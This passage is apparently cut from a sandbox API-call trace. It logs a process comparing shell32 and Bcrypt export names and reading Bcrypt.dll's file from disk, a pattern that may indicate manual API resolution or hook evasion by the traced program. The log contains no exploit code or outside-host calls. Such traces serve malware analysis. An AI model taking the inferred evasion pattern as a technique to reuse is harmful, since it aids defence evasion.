(lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0089.807] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0089.807] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0089.807] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0089.807] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0089.807] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0089.807] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0089.808] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0089.808] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0089.808] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0089.809] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0089.809] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0089.809] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0089.809] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0089.809] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0089.809] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0089.809] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0089.809] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0089.809] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0089.809] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0089.809] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0089.809] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0089.809] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0089.809] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0089.809] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0089.839] GetProcessHeap () returned 0x440000 [0089.839] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4037040 | out: hHeap=0x440000) returned 1 [0090.475] GetProcessHeap () returned 0x440000 [0090.475] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x10) returned 0x459240 [0090.477] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0090.632] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0090.632] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0090.632] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0090.632] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.632] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0090.632] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0090.632] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0090.632] GetProcessHeap () returned 0x440000 [0090.632] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x26fa0) returned 0x2c72010 [0090.634] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0090.634] ReadFile (in: hFile=0x15c, lpBuffer=0x2c72010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c72010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0090.642] CloseHandle (hObject=0x15c) returned 1 [0090.642] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0090.642] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0090.642] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0090.642] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0090.642] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.642] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0090.642] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0090.642] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.643] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.643] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0090.643] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0090.643] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.643] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.643] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0090.643] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0090.643] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0090.643] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.643] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.643] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0090.643] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0090.643] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0090.643] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0090.643] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.643] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.643] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0090.643] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0090.643] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0090.643] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0090.643] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0090.643] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.643] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.643] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0090.643] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0090.643] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0090.644] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0090.644] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0090.644] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0090.644] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0090.644] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0090.644] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0090.645] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0090.645] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0090.646] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0090.646] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0090.647] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0090.647] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0090.647] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0090.647] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0090.648] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.648] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.648] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0090.648] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0090.648] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0090.648] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0090.648] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0090.649] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0090.649] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0090.649] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0090.649] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0090.649] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0090.649] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0090.649] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0090.649] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0090.649] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0090.649] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0090.649] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0090.649] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0090.649] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0090.649] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0090.649] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0090.649] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0090.649] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0090.649] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0090.649] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0090.649] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0090.649] lstrcmpA 